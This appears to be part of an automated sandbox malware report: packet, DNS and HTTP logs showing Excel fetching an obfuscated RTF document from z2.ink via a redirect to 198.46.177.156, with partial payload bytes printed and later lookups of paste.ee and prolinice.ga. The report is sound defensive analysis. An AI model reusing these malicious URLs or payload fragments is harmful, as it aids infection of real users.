May 27, 2024 18:36:09.599282026 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.599307060 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.599349022 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.600101948 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.600172043 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.600208998 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.600218058 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.600244045 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.600279093 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.600285053 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.600333929 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.600368023 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.600377083 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.600399017 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.600431919 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.600445032 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.600471973 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.600505114 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.600516081 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.600543022 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.600584030 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.600635052 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.600702047 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.600737095 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.600744009 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.600769997 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.600812912 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.605271101 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.621243954 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.621321917 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.621371984 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.621373892 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.621409893 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.621463060 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.621463060 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.621496916 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.621530056 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.621541023 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.621566057 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.621609926 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.621623039 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.621656895 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.621702909 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.621757984 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.621790886 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.621824026 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.621840000 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.621856928 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.621898890 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.622050047 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.622082949 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.622117043 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.622124910 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.622150898 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.622191906 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.622435093 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.622467995 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.622509003 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.622526884 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.622560024 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.622591972 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.622607946 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.622627020 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.622658968 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.622667074 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.622698069 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.622746944 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.622881889 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.622910976 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.622956991 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.622960091 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.622994900 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.623042107 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.623096943 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.623131037 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.623163939 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.623171091 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.623197079 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.623230934 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.623239994 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.623567104 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.623600960 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.623610973 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.623635054 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.623667955 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.623676062 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.623701096 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.623733997 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.623745918 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.623768091 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.623800993 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.623809099 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.623835087 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.623867035 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.623881102 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.623902082 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.623949051 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.624264002 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.624296904 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.624330044 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.624345064 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.624362946 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.624397993 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.624404907 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.624430895 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.624466896 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.624471903 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.624495983 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.624545097 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.642219067 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.642393112 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.642405987 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.642421007 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.642436981 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.642440081 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.642453909 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.642460108 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.642493010 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.642549038 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.642565012 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.642601967 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.651592970 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.651617050 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.651631117 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.651662111 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.651787996 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.651803017 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.651818037 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.651830912 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.651858091 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.651913881 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.651957035 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.652192116 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.657042027 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:17.017316103 CEST	49177	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:17.023359060 CEST	80	49177	77.232.129.190	192.168.2.22
May 27, 2024 18:36:17.023425102 CEST	49177	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:17.026357889 CEST	49177	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:17.026417971 CEST	49177	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:17.032160044 CEST	80	49177	77.232.129.190	192.168.2.22
May 27, 2024 18:36:17.032202959 CEST	80	49177	77.232.129.190	192.168.2.22
May 27, 2024 18:36:17.032593012 CEST	80	49177	77.232.129.190	192.168.2.22
May 27, 2024 18:36:18.009824038 CEST	80	49177	77.232.129.190	192.168.2.22
May 27, 2024 18:36:18.011038065 CEST	80	49177	77.232.129.190	192.168.2.22
May 27, 2024 18:36:18.011109114 CEST	49177	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:18.015825987 CEST	49177	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:18.021311998 CEST	80	49177	77.232.129.190	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2024 18:35:10.698960066 CEST	54562	53	192.168.2.22	8.8.8.8
May 27, 2024 18:35:10.715420961 CEST	53	54562	8.8.8.8	192.168.2.22
May 27, 2024 18:35:13.008763075 CEST	52917	53	192.168.2.22	8.8.8.8
May 27, 2024 18:35:13.016000986 CEST	53	52917	8.8.8.8	192.168.2.22
May 27, 2024 18:35:15.581310987 CEST	62751	53	192.168.2.22	8.8.8.8
May 27, 2024 18:35:15.598093033 CEST	53	62751	8.8.8.8	192.168.2.22
May 27, 2024 18:35:15.599875927 CEST	57893	53	192.168.2.22	8.8.8.8
May 27, 2024 18:35:15.615236998 CEST	53	57893	8.8.8.8	192.168.2.22
May 27, 2024 18:35:19.994371891 CEST	54821	53	192.168.2.22	8.8.8.8
May 27, 2024 18:35:20.008498907 CEST	53	54821	8.8.8.8	192.168.2.22
May 27, 2024 18:35:20.010200977 CEST	54719	53	192.168.2.22	8.8.8.8
May 27, 2024 18:35:20.022335052 CEST	53	54719	8.8.8.8	192.168.2.22
May 27, 2024 18:35:26.430906057 CEST	49881	53	192.168.2.22	8.8.8.8
May 27, 2024 18:35:26.441282034 CEST	53	49881	8.8.8.8	192.168.2.22
May 27, 2024 18:35:31.720659971 CEST	54998	53	192.168.2.22	8.8.8.8
May 27, 2024 18:35:31.732058048 CEST	53	54998	8.8.8.8	192.168.2.22
May 27, 2024 18:36:07.726792097 CEST	52781	53	192.168.2.22	8.8.8.8
May 27, 2024 18:36:07.828253031 CEST	53	52781	8.8.8.8	192.168.2.22
May 27, 2024 18:36:07.853092909 CEST	63926	53	192.168.2.22	8.8.8.8
May 27, 2024 18:36:08.142760992 CEST	53	63926	8.8.8.8	192.168.2.22
May 27, 2024 18:36:16.764548063 CEST	65510	53	192.168.2.22	8.8.8.8
May 27, 2024 18:36:16.862154007 CEST	53	65510	8.8.8.8	192.168.2.22
May 27, 2024 18:36:16.887022018 CEST	62672	53	192.168.2.22	8.8.8.8
May 27, 2024 18:36:17.012178898 CEST	53	62672	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 27, 2024 18:35:10.698960066 CEST	192.168.2.22	8.8.8.8	0xe3f3	Standard query (0)	z2.ink	A (IP address)	IN (0x0001)	false
May 27, 2024 18:35:13.008763075 CEST	192.168.2.22	8.8.8.8	0xe102	Standard query (0)	z2.ink	A (IP address)	IN (0x0001)	false
May 27, 2024 18:35:15.581310987 CEST	192.168.2.22	8.8.8.8	0x79be	Standard query (0)	z2.ink	A (IP address)	IN (0x0001)	false
May 27, 2024 18:35:15.599875927 CEST	192.168.2.22	8.8.8.8	0xe129	Standard query (0)	z2.ink	A (IP address)	IN (0x0001)	false
May 27, 2024 18:35:19.994371891 CEST	192.168.2.22	8.8.8.8	0x1100	Standard query (0)	z2.ink	A (IP address)	IN (0x0001)	false
May 27, 2024 18:35:20.010200977 CEST	192.168.2.22	8.8.8.8	0x2664	Standard query (0)	z2.ink	A (IP address)	IN (0x0001)	false
May 27, 2024 18:35:26.430906057 CEST	192.168.2.22	8.8.8.8	0x69cc	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
May 27, 2024 18:35:31.720659971 CEST	192.168.2.22	8.8.8.8	0xcace	Standard query (0)	uploaddeimagens.com.br	A (IP address)	IN (0x0001)	false
May 27, 2024 18:36:07.726792097 CEST	192.168.2.22	8.8.8.8	0x575c	Standard query (0)	prolinice.ga	A (IP address)	IN (0x0001)	false
May 27, 2024 18:36:07.853092909 CEST	192.168.2.22	8.8.8.8	0xebec	Standard query (0)	prolinice.ga	A (IP address)	IN (0x0001)	false
May 27, 2024 18:36:16.764548063 CEST	192.168.2.22	8.8.8.8	0x99c8	Standard query (0)	prolinice.ga	A (IP address)	IN (0x0001)	false
May 27, 2024 18:36:16.887022018 CEST	192.168.2.22	8.8.8.8	0xdab1	Standard query (0)	prolinice.ga	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
May 27, 2024 18:35:10.715420961 CEST	8.8.8.8	192.168.2.22	0xe3f3	No error (0)	z2.ink	54.241.153.192	A (IP address)	IN (0x0001)	false
May 27, 2024 18:35:13.016000986 CEST	8.8.8.8	192.168.2.22	0xe102	No error (0)	z2.ink	54.241.153.192	A (IP address)	IN (0x0001)	false
May 27, 2024 18:35:15.598093033 CEST	8.8.8.8	192.168.2.22	0x79be	No error (0)	z2.ink	54.241.153.192	A (IP address)	IN (0x0001)	false
May 27, 2024 18:35:15.615236998 CEST	8.8.8.8	192.168.2.22	0xe129	No error (0)	z2.ink	54.241.153.192	A (IP address)	IN (0x0001)	false
May 27, 2024 18:35:20.008498907 CEST	8.8.8.8	192.168.2.22	0x1100	No error (0)	z2.ink	54.241.153.192	A (IP address)	IN (0x0001)	false
May 27, 2024 18:35:20.022335052 CEST	8.8.8.8	192.168.2.22	0x2664	No error (0)	z2.ink	54.241.153.192	A (IP address)	IN (0x0001)	false
May 27, 2024 18:35:26.441282034 CEST	8.8.8.8	192.168.2.22	0x69cc	No error (0)	paste.ee	188.114.96.3	A (IP address)	IN (0x0001)	false
May 27, 2024 18:35:26.441282034 CEST	8.8.8.8	192.168.2.22	0x69cc	No error (0)	paste.ee	188.114.97.3	A (IP address)	IN (0x0001)	false
May 27, 2024 18:35:31.732058048 CEST	8.8.8.8	192.168.2.22	0xcace	No error (0)	uploaddeimagens.com.br	188.114.97.3	A (IP address)	IN (0x0001)	false
May 27, 2024 18:35:31.732058048 CEST	8.8.8.8	192.168.2.22	0xcace	No error (0)	uploaddeimagens.com.br	188.114.96.3	A (IP address)	IN (0x0001)	false
May 27, 2024 18:36:07.828253031 CEST	8.8.8.8	192.168.2.22	0x575c	No error (0)	prolinice.ga	77.232.129.190	A (IP address)	IN (0x0001)	false
May 27, 2024 18:36:08.142760992 CEST	8.8.8.8	192.168.2.22	0xebec	No error (0)	prolinice.ga	77.232.129.190	A (IP address)	IN (0x0001)	false
May 27, 2024 18:36:16.862154007 CEST	8.8.8.8	192.168.2.22	0x99c8	No error (0)	prolinice.ga	77.232.129.190	A (IP address)	IN (0x0001)	false
May 27, 2024 18:36:17.012178898 CEST	8.8.8.8	192.168.2.22	0xdab1	No error (0)	prolinice.ga	77.232.129.190	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

paste.ee

uploaddeimagens.com.br

z2.ink

198.46.177.156

aikpfjvjuwcsxfjs.net

prolinice.ga

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	54.241.153.192	80	2772	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 18:35:10.727703094 CEST	317	OUT	GET /nXPJ HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: z2.ink Connection: Keep-Alive
May 27, 2024 18:35:11.326527119 CEST	580	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Edge: smart-1.high-performance.network Location: http://198.46.177.156/xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc Date: Mon, 27 May 2024 16:35:07 GMT Content-Length: 89 Content-Encoding: gzip Vary: Accept-Encoding Server: LINKSGPT Cache-Control: no-store, no-cache, must-revalidate Connection: keep-alive Data Raw: 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 0b c9 c8 2c 56 08 48 4c 4f 55 f0 48 2c 4b 55 f0 cd 2f 4b 4d b1 d1 87 c8 d9 e8 83 55 72 d9 24 e5 a7 54 82 f4 19 e2 50 0e 94 e0 b2 d1 87 aa d2 07 db 02 00 30 39 f0 91 6c 00 00 00 Data Ascii: (HML),I,VHLOUH,KU/KMUr$TP09l

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49162	198.46.177.156	80	2772	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 18:35:11.337543011 CEST	466	OUT	GET /xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 198.46.177.156 Connection: Keep-Alive
May 27, 2024 18:35:12.002454042 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 16:35:11 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sun, 26 May 2024 17:14:39 GMT ETag: "70ea-6195e893196e9" Accept-Ranges: bytes Content-Length: 28906 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword Data Raw: 7b 5c 72 74 0d 09 09 09 09 09 09 09 09 7b 5c 2a 5c 66 6f 6e 74 69 6e 66 6f 32 35 30 35 36 39 31 36 30 20 5c 22 7d 0d 7b 5c 33 39 38 35 31 39 32 31 33 26 5d 2f 33 a7 b0 60 2b 35 36 3f 3f 5e 3f 32 29 34 2f 5f 7e 36 21 2c 3f 5f 26 31 2f 26 36 5d 3d a7 b5 39 3a 33 5d 38 2a 2f 7c 2e 3c 60 26 b0 3a 23 28 b0 34 31 a7 5f 2b 37 25 33 35 32 7c 31 29 34 3f 34 5e 5f 40 2e 3c 7e b5 2e 60 2a 25 40 32 2f 25 3f 34 2b 26 36 25 39 a7 b5 3f 3f 7e 32 3a 3f 30 3f 21 2a 33 33 2e 24 30 60 21 38 38 5d 3f 33 30 a7 21 3f 3f 3c 5b 3f 25 24 28 24 3c 3f 33 2c 3f 2f b0 25 21 2f 34 32 35 3f 30 25 29 39 2d 25 40 2f 31 31 7e 3f 3f 36 30 25 31 34 2a 38 2e 2d 39 24 3f 23 3f 34 b0 5e 30 2d 36 5d 37 32 3f 39 40 33 31 37 2a 24 7c 5b 33 2d 29 3a 33 3f 60 35 37 b0 b5 21 a7 26 3c 2d a7 b5 38 2f 40 31 35 5d 5f 7c 2d 2b b0 38 38 3f 33 24 3f 3b 35 3f 2f 2d 2c 30 29 60 2a 2c b5 2b 40 31 21 21 3c 26 26 33 25 28 28 32 31 7e 36 25 3a 37 3f 2d 3f 3f 28 b5 23 21 b5 35 5f 24 a7 2f 24 26 24 29 a7 3e 7e 25 28 2b 3b 3f 28 7c a7 2f 60 27 30 29 36 7e 60 [TRUNCATED] Data Ascii: {\rt{\\fontinfo250569160 \"}{\398519213&]/3`+56??^?2)4/_~6!,?_&1/&6]=9:3]8/\|.<`&:#(41_+7%352\|1)4?4^_@.<~.`%@2/%?4+&6%9??~2:?0?!33.$0`!88]?30!??<[?%$($<?3,?/%!/425?0%)9-%@/11~??60%148.-9$?#?4^0-6]72?9@317$\|[3-):3?`57!&<-8/@15]_\|-+88?3$?;5?/-,0)`,+@1!!<&&3%((21~6%:7?-??(#!5_$/$&$)>~%(+;?(\|/`'0)6~`'%3`.,%#==.'[?!?50:%$,\|$=&`??%8)532%9^~^?#?64:3\|-^%#71.7$?_??@)9?=181$<;$/7,?-%28]=~0408!][/8?22)[?;)\|-)1_+4.@`(+?+#>=]:%4+0!!$6;?3)1+?&)2)2][#:13?<1?0$?+79/%8''~.1!>@-\|^&3':??~?0?)9@1#&(~68(@05;;:4~?^@#)'5][)#,6/'@[\|6)!%,_>:@~%,$`?%\|(2@3:%414^%^./#>!%`$&_:9!#+;?',63'?`&?-:>_<?+='?2=59:[%0..?\|[/.47?+,(%`)19.97'),_@?_%_$/?+>,]7]+=7/.?#:[07;1^2]2[46#%;8?0`?/??(,?]7]?\|6<;%;<-~]&$%0')^+;24[+[;53/@8_?\|?5_?4%_).92~@-3,'!9)57?>-^@1+5<][6<!&22?2_16/1\|>^;%;%@8#&:4??(25(?5)!'7%?75;=-//(3?&)6_1'[)3^;~$>93!+.-!?'17?_/*?8.1???(%+
May 27, 2024 18:35:12.002532959 CEST	224	IN	Data Raw: 3f 3f 7c 3e 3c 2c 38 31 40 36 31 3c 7e 21 3f b5 2f 27 5d 7e 5e 37 34 38 35 3e 24 28 29 a7 2d 3f 3c 34 5e 2e b0 29 33 3a 2e 32 2e b5 29 26 34 38 2f 29 3f 3e 3b b5 2c 21 29 37 27 27 3f b0 27 5d 36 b5 39 34 3b 2b 21 2d 3f 3f 39 24 28 a7 39 3f 2e 7c Data Ascii: ??\|><,81@61<~!?/']~^7485>$()-?<4^.)3:.2.)&48/)?>;,!)7''?']694;+!-??9$(9?.\|11=?,!),+<:+]6?~+.7)`^[^9!-3),!?>?[\|%\|.)@&%%9=?=:5[0!3#%?^!@\|9#@?(0'>[(0--'~(??!`6?>~%?(-\|&_3765+8?%:#\|-??+.%+<9)>??_5:/1(='%$?]?\|&
May 27, 2024 18:35:12.002616882 CEST	1236	IN	Data Raw: 3c 30 7e 5b 28 b5 3f 7c 3d b5 a7 3f 3f 25 2d 37 5d 25 37 2f 3c 3f b5 30 36 3f 25 a7 24 2f 39 2f 3f 3a 5d 40 3f 7e 2d 2c 27 27 21 2f 24 31 3f 2f 3a 35 7c 5b 21 3f 3a 34 3e 60 7c 3f 31 2e 38 3f 34 3a 2d 5d 7c 2c 28 29 2c 3f 7c 3e 2e 33 3f 38 24 40 Data Ascii: <0~[(?\|=??%-7]%7/<?06?%$/9/?:]@?~-,''!/$1?/:5\|[!?:4>`\|?1.8?4:-]\|,(),?\|>.3?8$@88?<-8.0'<??>~)#']_%0?:)=>,#2^98!4\|+/#?_?$+?()#^48.?9%?7@;9???+~0+#?>15#,$?_!3'%2>>((%-%>[\|:,%6=)\|%::3^^(2@7-32/.\|?0&60%25+$%@^690]??^$?$#/428^3*`6!??
May 27, 2024 18:35:12.002652884 CEST	1236	IN	Data Raw: 20 20 20 20 20 09 09 20 20 09 20 20 20 09 30 30 30 34 0d 0d 0a 0a 0d 0a 0a 0d 35 37 0a 0d 0d 0d 0d 0a 0a 0d 31 35 09 09 09 09 20 09 20 20 20 20 20 20 20 20 09 09 20 20 09 20 20 20 09 35 20 20 20 20 09 20 09 20 20 09 20 09 09 09 09 20 09 09 09 20 Data Ascii: 00045715 5 4 15 4696f4e 2e 33000
May 27, 2024 18:35:12.002690077 CEST	1236	IN	Data Raw: 32 09 09 20 20 09 09 09 09 09 09 09 20 09 20 09 09 09 20 09 09 20 09 09 38 66 34 31 0d 0d 0a 0a 0d 0d 0d 0d 62 37 34 35 34 33 0d 0d 0a 0a 0d 0d 0d 0d 30 09 09 20 09 20 20 09 09 09 09 09 20 09 20 09 09 09 20 09 09 20 09 09 30 09 09 20 09 09 09 20 Data Ascii: 2 8f41b745430 0 e1e8780 a 04f 924e11108a44a08
May 27, 2024 18:35:12.002727032 CEST	1236	IN	Data Raw: 20 09 09 20 09 64 09 09 20 20 20 09 09 09 20 09 09 20 09 20 09 20 09 20 20 09 09 20 09 36 39 39 09 09 20 09 09 20 09 20 20 20 09 09 09 20 09 20 09 20 20 09 09 20 09 63 66 09 09 20 20 20 09 09 20 09 09 09 09 09 20 09 20 09 20 20 09 09 20 09 65 20 Data Ascii: d 699 cf e 11caf3e5bd 510a7 b 869 0
May 27, 2024 18:35:12.002763033 CEST	1236	IN	Data Raw: 09 09 20 20 09 09 62 33 09 09 20 09 09 09 09 09 20 20 20 09 20 09 09 20 20 09 09 20 20 09 09 66 0a 0a 0d 0a 0a 0a 0d 0d 64 30 20 09 20 09 09 09 09 09 20 20 20 09 20 09 09 20 20 09 09 20 20 09 09 66 20 09 09 09 20 20 09 09 20 20 20 09 20 09 09 20 Data Ascii: b3 fd0 f 1 0f30ef6502 aeb 46eb696
May 27, 2024 18:35:12.002798080 CEST	1236	IN	Data Raw: 38 64 62 0a 0a 0a 0d 0a 0d 0d 0d 66 20 09 09 20 09 09 09 09 20 20 20 20 09 20 20 09 20 09 20 20 20 20 09 35 30 33 0a 0d 0d 0d 0a 0d 0d 0d 63 09 20 09 20 09 09 09 09 20 20 20 20 09 20 20 09 20 09 20 20 20 20 09 30 30 30 09 20 20 09 09 09 09 09 09 Data Ascii: 8dbf 503c 000 05f5b9 d e bdfeb ca e
